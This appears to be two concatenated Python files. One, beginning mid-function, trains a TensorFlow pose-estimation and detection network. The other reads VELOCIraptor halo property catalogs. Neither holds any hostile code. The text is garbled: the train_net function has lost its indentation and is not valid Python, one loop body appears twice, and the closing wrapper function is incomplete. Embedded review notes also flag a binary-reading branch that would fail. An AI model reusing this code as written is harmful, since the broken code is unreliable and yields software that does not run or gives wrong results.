                                     net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                     net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
                                     net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
                    else:
                        feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
            else:
                if cfg.INPUT == 'RGBD':
                    feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
                                 net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                                 net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
                else:
                    feed_dict = {net.data: data_blob, net.im_info: blobs['data_im_info'], \
                                 net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                                 net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
        else:
            if cfg.INPUT == 'RGBD':
                feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
                             net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                             net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
            else:
                feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
                             net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                             net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}

        # Blocks when the input queue is full.
        sess.run(net.enqueue_op, feed_dict=feed_dict)
def load_and_enqueue(sess, net, data_layer, coord, iters=0):
    # Producer loop for training: pulls minibatch blobs from the shared data
    # layer and feeds them into the network's input queue until `coord.run`
    # is cleared or `iters` minibatches have been enqueued.
    # NOTE(review): with the default iters=0 the loop body never executes;
    # some callers in this file pass no iters — confirm those paths.
    iter = 0
    # Switch the shared data layer to its training split.
    data_layer._validation = False
    while coord.run and iter < iters:
        blobs = data_layer.forward(iter)
        iter += 1

        # Select the input image blob(s) according to the configured modality.
        if cfg.INPUT == 'RGBD':
            data_blob = blobs['data_image_color']
            data_p_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'COLOR':
            data_blob = blobs['data_image_color']
        elif cfg.INPUT == 'DEPTH':
            data_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'NORMAL':
            data_blob = blobs['data_image_normal']

        # Dropout keep probability used during training (1.0 at validation).
        keep_prob = 0.5
        # Build the feed_dict for the configured task: single-frame
        # segmentation (with/without vertex regression), detection, or the
        # multi-frame path.
        if cfg.TRAIN.SINGLE_FRAME:
            if cfg.TRAIN.SEGMENTATION:
                if cfg.INPUT == 'RGBD':
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, \
                                     net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                     net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
                                     net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
                    else:
                        feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
                else:
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        # is_train=True marks these batches as training.
                        feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, net.is_train: True, \
                                     net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                     net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
                                     net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
                    else:
                        feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
            else:
                if cfg.INPUT == 'RGBD':
                    feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
                                 net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                                 net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
                else:
                    feed_dict = {net.data: data_blob, net.im_info: blobs['data_im_info'], \
                                 net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
                                 net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: keep_prob}
        else:
            if cfg.INPUT == 'RGBD':
                feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
                             net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                             net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}
            else:
                feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
                             net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
                             net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: keep_prob}

        # Blocks when the input queue is full.
        sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
    """Mean per-step normalized cross-entropy over the recurrent steps.

    scores: a list of tensors [batch_size, height, width, num_classes]
    labels: a list of tensors [batch_size, height, width, num_classes]
    """
    with tf.name_scope('loss'):
        n_steps = cfg.TRAIN.NUM_STEPS
        step_losses = []
        for i in range(n_steps):
            # Cross-entropy summed over the class axis, normalized by the
            # total label mass of the step.
            ce = -tf.reduce_sum(labels[i] * scores[i], reduction_indices=[3])
            step_losses.append(tf.div(tf.reduce_sum(ce), tf.reduce_sum(labels[i])))
        loss = sum(step_losses) / n_steps
    return loss
def loss_cross_entropy_single_frame(scores, labels):
    """Normalized cross-entropy between dense scores and labels.

    scores: a tensor [batch_size, height, width, num_classes]
    labels: a tensor [batch_size, height, width, num_classes]
    """
    with tf.name_scope('loss'):
        # Cross-entropy summed over the class axis, per pixel.
        per_pixel = -tf.reduce_sum(labels * scores, reduction_indices=[3])
        # Normalize by total label mass; epsilon guards against division by zero.
        normalizer = tf.reduce_sum(labels) + 1e-10
        loss = tf.div(tf.reduce_sum(per_pixel), normalizer)
    return loss
def loss_quaternion(pose_pred, pose_targets, pose_weights):
    """Weighted quaternion distance loss: mean of 1 - <q_pred, q_target>^2."""
    with tf.name_scope('loss'):
        # Inner product over the quaternion components (axis 1).
        inner = tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1])
        distances = 1 - tf.square(inner)
        # One scalar weight per sample; epsilon guards the normalizer.
        weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
        weighted_total = tf.reduce_sum(tf.multiply(weights, distances))
        loss = tf.div(weighted_total, tf.reduce_sum(weights) + 1e-10)
    return loss
def split_regression_branch(var_list1, var_list2):
    """Split trainable variables into backbone vs pose-regression FC branch.

    Returns (var_list1 without the fc6/fc7/fc8 variables,
             var_list2 restricted to the fc6/fc7/fc8 variables).
    """
    regression_vars = ['fc6/weights:0', 'fc6/biases:0', 'fc7/weights:0', 'fc7/biases:0', 'fc8/weights:0', 'fc8/biases:0']
    branch_names = set(regression_vars)
    backbone = [v for v in var_list1 if v.name not in branch_names]
    branch = [v for v in var_list2 if v.name in branch_names]
    return backbone, branch
def remove_item(var_list, name):
    """Return a new list without the variables whose ``.name`` equals ``name``."""
    kept = []
    for var in var_list:
        if var.name != name:
            kept.append(var)
    return kept
def keep_items(var_list, names_list):
    """Return a new list with only the variables whose ``.name`` is in ``names_list``."""
    kept = []
    for var in var_list:
        if var.name in names_list:
            kept.append(var)
    return kept
def train_net(network, imdb, roidb, roidb_val, output_dir, pretrained_model=None, pretrained_ckpt=None, iters_train=40000, iters_val=10000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
if cfg.TRAIN.SINGLE_FRAME:
# classification loss
if cfg.NETWORK == 'FCN8VGG':
scores = network.prob
labels = network.gt_label_2d_queue
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
# labels_val = network.get_output2('gt_label_weight')
loss_cls = network.get_output('loss_cls')
# loss_cls_val = loss_cross_entropy_single_frame(scores_val, labels_val)
vertex_pred = network.get_output('vertex_pred')
# vertex_pred_val = network.get_output2('vertex_pred')
vertex_targets = network.get_output('vertex_targets')
# vertex_targets_val = network.get_output2('vertex_targets')
vertex_weights = network.get_output('vertex_weights')
# vertex_weights_val = network.get_output2('vertex_weights')
# loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
# loss_vertex_val = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred_val, vertex_targets_val, vertex_weights_val)
if cfg.TRAIN.POSE_REG:
# pose_pred = network.get_output('poses_pred')
# pose_targets = network.get_output('poses_target')
# pose_weights = network.get_output('poses_weight')
# loss_pose = cfg.TRAIN.POSE_W * tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
# loss_pose = cfg.TRAIN.POSE_W * loss_quaternion(pose_pred, pose_targets, pose_weights)
loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
# loss_pose_val = cfg.TRAIN.POSE_W * network.get_output2('loss_pose')[0]
if cfg.TRAIN.ADAPT:
domain_score = network.get_output("domain_score")
domain_label = network.get_output("domain_label")
label_domain = network.get_output("label_domain")
loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
else:
loss = loss_cls + loss_vertex + loss_pose + loss_regu
# loss_val = loss_cls_val + loss_vertex_val + loss_pose_val + loss_regu_val
else:
loss = loss_cls + loss_vertex + loss_regu
else:
loss_cls = network.get_output('loss_cls')
loss = loss_cls + loss_regu
else:
# classification loss
scores = network.get_output('outputs')
labels = network.get_output('labels_gt_2d')
loss = loss_cross_entropy(scores, labels) + loss_regu
all_except_pose_fc_layers, pose_fc_layers = split_regression_branch(tf.trainable_variables(), tf.trainable_variables())
# print("######### VARS ###########")
# print(all_without_regression_branch)
# print(regression_vars)
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, cfg.TRAIN.STEPSIZE, 0.5, staircase=False)
learning_rate_pose_loss = tf.train.exponential_decay(starter_learning_rate/10, global_step, cfg.TRAIN.STEPSIZE, 0.5, staircase=False)
momentum = cfg.TRAIN.MOMENTUM
#learning_rate = clr.cyclic_learning_rate(global_step=global_step, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10, step_size=2,
# mode='triangular2', gamma=0.99994)
#train_op = tf.train.MomentumOptimizer(clr.cyclic_learning_rate(global_step=global_step, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10, step_size=2,
# mode='triangular2', gamma=0.99994), momentum).minimize(loss, global_step=global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
# train_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step, var_list=all_except_pose_fc_layers)
# train_op_pose = tf.train.AdamOptimizer(learning_rate_pose_loss, momentum).minimize(loss, global_step=global_step, var_list=pose_fc_layers)
# val_op = tf.train.AdamOptimizer(learning_rate, momentum).minimize(loss_val, global_step=global_step)
# val_dict = {"val_op": val_op,
# "loss_val": loss_val,
# "loss_cls_vall": loss_cls_val,
# "loss_vertex_val": loss_vertex_val,
# "loss_pose": loss_pose_val
# }
# config = tf.ConfigProto()
# config.gpu_options.per_process_gpu_memory_fraction = 0.85
# config.gpu_options.allow_growth = True
# with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
#sess = tf_debug.TensorBoardDebugWrapperSession(sess, 'localhost:6064')
# data layer
if cfg.TRAIN.SINGLE_FRAME:
data_layer = GtSynthesizeLayer(roidb, roidb_val, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, imdb.data_queue,
cfg.CAD, cfg.POSE, imdb._class_colors)
else:
data_layer = GtDataLayer(roidb, imdb.num_classes)
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
print 'Solving...'
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
if cfg.TRAIN.POSE_REG:
if cfg.TRAIN.ADAPT:
sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, iters_train, data_layer)
else:
sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate, iters_train, iters_val, data_layer, imdb)
else:
sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, iters_train, data_layer)
else:
sw.train_model(sess, train_op, loss, loss_cls, loss_regu, learning_rate, iters_train, iters_val, data_layer)
print 'done solving'
def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=None):
    """Smooth-L1 (Huber-style) loss for bounding-box regression (Fast R-CNN).

    The loss is quadratic, 0.5 * (sigma * x)^2, where |x| < 1 / sigma^2 and
    linear, |x| - 0.5 / sigma^2, elsewhere; x is the inside-weighted
    difference bbox_pred - bbox_targets, and the result is weighted by
    bbox_outside_weights before the reduction.

    Args:
        bbox_pred: predicted box regression tensor.
        bbox_targets: regression targets, same shape as bbox_pred.
        bbox_inside_weights: per-element mask applied before the loss.
        bbox_outside_weights: per-element weights applied after the loss.
        sigma: controls the transition point between L2 and L1 regimes.
        dim: axes summed over before the final mean; defaults to (1,).

    Returns:
        Scalar loss tensor.
    """
    # None-sentinel replaces the old mutable default argument dim=[1];
    # (1,) reproduces the previous default behavior exactly.
    if dim is None:
        dim = (1,)
    sigma_2 = sigma ** 2
    box_diff = bbox_pred - bbox_targets
    in_box_diff = bbox_inside_weights * box_diff
    abs_in_box_diff = tf.abs(in_box_diff)
    # 1.0 where the quadratic branch applies, 0.0 otherwise; stop_gradient so
    # the branch selection itself is not differentiated through.
    smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_in_box_diff, 1. / sigma_2)))
    in_loss_box = tf.pow(in_box_diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
                  + (abs_in_box_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
    out_loss_box = bbox_outside_weights * in_loss_box
    loss_box = tf.reduce_mean(tf.reduce_sum(
        out_loss_box,
        axis=dim
    ))
    return loss_box
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
    """Train a Fast R-CNN network.

    Builds the combined Faster R-CNN detection loss (RPN classification and
    box regression, RCNN classification and box regression, plus a pose
    regression term and the regularization losses collected on the graph),
    sets up a momentum optimizer with step-decayed learning rate, and hands
    everything to SolverWrapper.train_model_det inside a fresh session.

    Args:
        network: model object exposing named graph tensors via get_output().
        imdb: dataset object (provides num_classes, extents, cache paths...).
        roidb: list of roi annotations used by the data layer.
        output_dir: directory where snapshots are written (via SolverWrapper).
        pretrained_model / pretrained_ckpt: optional initialization weights.
        max_iters: number of training iterations.
    """
    # sum of all regularization losses registered on the default graph
    loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
    # RPN, class loss: only anchors with label != -1 contribute
    rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
    rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
    rpn_select = tf.where(tf.not_equal(rpn_label, -1))
    rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
    rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
    loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
    # RPN, bbox loss (sigma=3 gives a narrower quadratic region than RCNN's)
    rpn_bbox_pred = network.get_output('rpn_bbox_pred')
    rpn_bbox_targets = network.get_output('rpn_bbox_targets')
    rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
    rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
    loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
                                  rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
    # RCNN, class loss
    cls_score = network.get_output("cls_score")
    label = tf.reshape(network.get_output("labels"), [-1])
    loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
    # RCNN, bbox loss
    bbox_pred = network.get_output('bbox_pred')
    bbox_targets = network.get_output('bbox_targets')
    bbox_inside_weights = network.get_output('bbox_inside_weights')
    bbox_outside_weights = network.get_output('bbox_outside_weights')
    loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
    # pose regression loss (computed inside the network graph)
    loss_pose = network.get_output('loss_pose')[0]
    # add losses
    loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
    # optimizer: SGD with momentum, learning rate decayed by 10x every STEPSIZE
    global_step = tf.Variable(0, trainable=False)
    starter_learning_rate = cfg.TRAIN.LEARNING_RATE
    learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
                                               cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
    momentum = cfg.TRAIN.MOMENTUM
    train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
    # config = tf.ConfigProto()
    # config.gpu_options.per_process_gpu_memory_fraction = 0.85
    # config.gpu_options.allow_growth = True
    # with tf.Session(config=config) as sess:
    with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
        sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
        # thread to load data
        # NOTE(review): this GtSynthesizeLayer call passes fewer arguments than
        # the call in train_net (no roidb_val / data_queue / class_colors) —
        # verify against GtSynthesizeLayer's signature.
        data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
        print 'Solving...'
        sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
        print 'done solving'
|
velociraptor_python_tools.py | #Make backwards compatible with python 2, ignored in python 3
from __future__ import print_function
import sys,os,os.path,string,time,re,struct
import math,operator
import numpy as np
import h5py #import hdf5 interface
import tables as pytb #import pytables
import pandas as pd
from copy import deepcopy
from collections import deque
import itertools
import scipy.interpolate as scipyinterp
import scipy.spatial as spatial
import multiprocessing as mp
from collections import deque
import copy
import cython
from cython.parallel import prange, parallel
#would be good to compile these routines with cython
#try to speed up search
#cimport numpy as np
"""
Routines for reading velociraptor output
"""
"""
IO Routines
"""
def ReadPropertyFile(basefilename,ibinary=0,iseparatesubfiles=0,iverbose=0, desiredfields=[], isiminfo=True, iunitinfo=True):
    """
    Read a VELOCIraptor/STF .properties catalog in one of several formats.

    VELOCIraptor/STF files in various formats
    for example ascii format contains
    a header with
        filenumber number_of_files
        numhalos_in_file nnumhalos_in_total
    followed by a header listing the information contained. An example would be
        ID(1) ID_mbp(2) hostHaloID(3) numSubStruct(4) npart(5) Mvir(6) Xc(7) ...
    then followed by data.
    Note that a file will indicate how many files the total output has been split into.

    Args:
        basefilename: catalog name without the ".properties" suffix.
        ibinary: 0 = ascii, 1 = binary, 2 = HDF5.
        iseparatesubfiles: if 1, also read the ".sublevels" companion files.
        iverbose: 0 silent, 1 progress messages.
        desiredfields: optional list of field names to load, e.g.
            ['ID', 'Mass_FOF', 'Krot']; empty list loads everything.
            #todo still need checks to see if fields are not present and if so,
            not to include them or handle the error
        isiminfo / iunitinfo: also parse the ".siminfo" / ".units" companion
            files into catalog['SimulationInfo'] / catalog['UnitInfo'].

    Returns:
        (catalog, numtothalos): dict of numpy arrays keyed by field name, and
        the total halo count; [] if the file is not found.
    """
    #this variable is the size of the char array in binary formated data that stores the field names
    CHARSIZE=40
    # NOTE(review): time.clock() was removed in Python 3.8; time.time() is the
    # portable replacement (used consistently throughout this module).
    start = time.clock()
    inompi=True
    if (iverbose): print("reading properties file",basefilename)
    filename=basefilename+".properties"
    #load header
    if (os.path.isfile(filename)==True):
        numfiles=0
    else:
        # single-file output not found: assume an MPI run split across
        # ".properties.N" files and probe the first one
        filename=basefilename+".properties"+".0"
        inompi=False
        if (os.path.isfile(filename)==False):
            print("file not found")
            return []
    byteoffset=0
    #used to store fields, their type, etc
    fieldnames=[]
    fieldtype=[]
    fieldindex=[]
    if (ibinary==0):
        #load ascii file
        halofile = open(filename, 'r')
        #read header information
        [filenum,numfiles]=halofile.readline().split()
        filenum=int(filenum);numfiles=int(numfiles)
        [numhalos, numtothalos]= halofile.readline().split()
        numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
        names = ((halofile.readline())).split()
        #remove the brackets in ascii file names, e.g. "Mvir(6)" -> "Mvir"
        fieldnames= [fieldname.split("(")[0] for fieldname in names]
        # integer-count fields get unsigned ints, IDs signed ints (hostHaloID
        # can be -1), everything else float
        for i in np.arange(fieldnames.__len__()):
            fieldname=fieldnames[i]
            if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
                fieldtype.append(np.uint64)
            elif fieldname in ["ID_mbp", "hostHaloID"]:
                fieldtype.append(np.int64)
            else:
                fieldtype.append(np.float64)
        halofile.close()
        #if desiredfields is NULL load all fields
        #but if this is passed load only those fields
        if (len(desiredfields)>0):
            lend=len(desiredfields)
            fieldindex=np.zeros(lend,dtype=int)
            desiredfieldtype=[[] for i in range(lend)]
            for i in range(lend):
                fieldindex[i]=fieldnames.index(desiredfields[i])
                desiredfieldtype[i]=fieldtype[fieldindex[i]]
            fieldtype=desiredfieldtype
            fieldnames=desiredfields
        #to store the string containing data format for np.loadtxt
        fieldtypestring=''
        for i in np.arange(fieldnames.__len__()):
            if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
            elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
            elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
    elif (ibinary==1):
        #load binary file
        halofile = open(filename, 'rb')
        [filenum,numfiles]=np.fromfile(halofile,dtype=np.int32,count=2)
        [numhalos,numtothalos]=np.fromfile(halofile,dtype=np.uint64,count=2)
        headersize=np.fromfile(halofile,dtype=np.int32,count=1)[0]
        byteoffset=np.dtype(np.int32).itemsize*3+np.dtype(np.uint64).itemsize*2+4*headersize
        for i in range(headersize):
            # NOTE(review): bare unpack() is not a visible import (struct is
            # imported as a module at file top) and a plain 's' format consumes
            # 1 byte, not CHARSIZE — this branch looks broken; confirm before
            # relying on ibinary==1.
            fieldnames.append(unpack('s', halofile.read(CHARSIZE)).strip())
        for i in np.arange(fieldnames.__len__()):
            fieldname=fieldnames[i]
            if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
                fieldtype.append(np.uint64)
            elif fieldname in ["ID_mbp", "hostHaloID"]:
                fieldtype.append(np.int64)
            else:
                fieldtype.append(np.float64)
        halofile.close()
        #if desiredfields is NULL load all fields
        #but if this is passed load only those fields
        if (len(desiredfields)>0):
            lend=len(desiredfields)
            fieldindex=np.zeros(lend,dtype=int)
            desiredfieldtype=[[] for i in range(lend)]
            for i in range(lend):
                fieldindex[i]=fieldnames.index(desiredfields[i])
                desiredfieldtype[i]=fieldtype[fieldindex[i]]
            fieldtype=desiredfieldtype
            fieldnames=desiredfields
        #to store the string containing data format
        fieldtypestring=''
        for i in np.arange(fieldnames.__len__()):
            if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
            elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
            elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
    elif (ibinary==2):
        #load hdf file
        halofile = h5py.File(filename, 'r')
        filenum=int(halofile["File_id"][0])
        numfiles=int(halofile["Num_of_files"][0])
        numhalos=np.uint64(halofile["Num_of_groups"][0])
        numtothalos=np.uint64(halofile["Total_num_of_groups"][0])
        #atime=np.float(halofile.attrs["Time"])
        fieldnames=[str(n) for n in halofile.keys()]
        #clean of header info
        fieldnames.remove("File_id")
        fieldnames.remove("Num_of_files")
        fieldnames.remove("Num_of_groups")
        fieldnames.remove("Total_num_of_groups")
        fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
        #if the desiredfields argument is passed only these fieds are loaded
        if (len(desiredfields)>0):
            if (iverbose):print("Loading subset of all fields in property file ", len(desiredfields), " instead of ", len(fieldnames))
            fieldnames=desiredfields
            fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
        halofile.close()
    #allocate memory that will store the halo dictionary (full total, filled
    #file by file below at increasing offsets)
    catalog={fieldnames[i]:np.zeros(numtothalos,dtype=fieldtype[i]) for i in range(len(fieldnames))}
    noffset=np.uint64(0)
    for ifile in range(numfiles):
        if (inompi==True): filename=basefilename+".properties"
        else: filename=basefilename+".properties"+"."+str(ifile)
        if (iverbose) : print("reading ",filename)
        if (ibinary==0):
            # re-read the per-file halo count from the header, then bulk-load
            halofile = open(filename, 'r')
            halofile.readline()
            numhalos=np.uint64(halofile.readline().split()[0])
            halofile.close()
            if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
        elif(ibinary==1):
            halofile = open(filename, 'rb')
            np.fromfile(halofile,dtype=np.int32,count=2)
            numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
            #halofile.seek(byteoffset);
            # NOTE(review): np.fromfile has no usecols/unpack keywords — this
            # call would raise TypeError; the binary path appears untested.
            if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
            halofile.close()
        elif(ibinary==2):
            #here convert the hdf information into a numpy array
            halofile = h5py.File(filename, 'r')
            numhalos=np.uint64(halofile["Num_of_groups"][0])
            if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
            halofile.close()
        #numhalos=len(htemp[0])
        for i in range(len(fieldnames)):
            catvalue=fieldnames[i]
            if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
        noffset+=numhalos
    #if subhalos are written in separate files, then read them too
    if (iseparatesubfiles==1):
        for ifile in range(numfiles):
            if (inompi==True): filename=basefilename+".sublevels"+".properties"
            else: filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
            if (iverbose) : print("reading ",filename)
            if (ibinary==0):
                halofile = open(filename, 'r')
                halofile.readline()
                numhalos=np.uint64(halofile.readline().split()[0])
                halofile.close()
                if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
            elif(ibinary==1):
                halofile = open(filename, 'rb')
                #halofile.seek(byteoffset);
                np.fromfile(halofile,dtype=np.int32,count=2)
                numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
                # NOTE(review): same invalid np.fromfile keywords as above.
                if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
                halofile.close()
            elif(ibinary==2):
                halofile = h5py.File(filename, 'r')
                numhalos=np.uint64(halofile["Num_of_groups"][0])
                if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
                halofile.close()
            #numhalos=len(htemp[0])
            for i in range(len(fieldnames)):
                catvalue=fieldnames[i]
                if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
            noffset+=numhalos
    #load associated simulation info, time and units
    if (isiminfo):
        siminfoname=basefilename+".siminfo"
        siminfo=open(siminfoname,'r')
        catalog['SimulationInfo']=dict()
        for l in siminfo:
            d=l.strip().split(' : ')
            catalog['SimulationInfo'][d[0]]=float(d[1])
        siminfo.close()
    if (iunitinfo):
        unitinfoname=basefilename+".units"
        unitinfo=open(unitinfoname,'r')
        catalog['UnitInfo']=dict()
        for l in unitinfo:
            d=l.strip().split(' : ')
            catalog['UnitInfo'][d[0]]=float(d[1])
        unitinfo.close()
    if (iverbose): print("done reading properties file ",time.clock()-start)
    return catalog,numtothalos
def ReadPropertyFileMultiWrapper(basefilename,index,halodata,numhalos,atime,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
    """
    Thin wrapper around ReadPropertyFile so it can be used as a
    multiprocessing target: the (catalog, halo count) result is written into
    the shared containers at position *index* instead of being returned.
    """
    # run the reader, then store each piece into its shared proxy slot
    result = ReadPropertyFile(basefilename, ibinary, iseparatesubfiles, iverbose, desiredfields)
    halodata[index] = result[0]
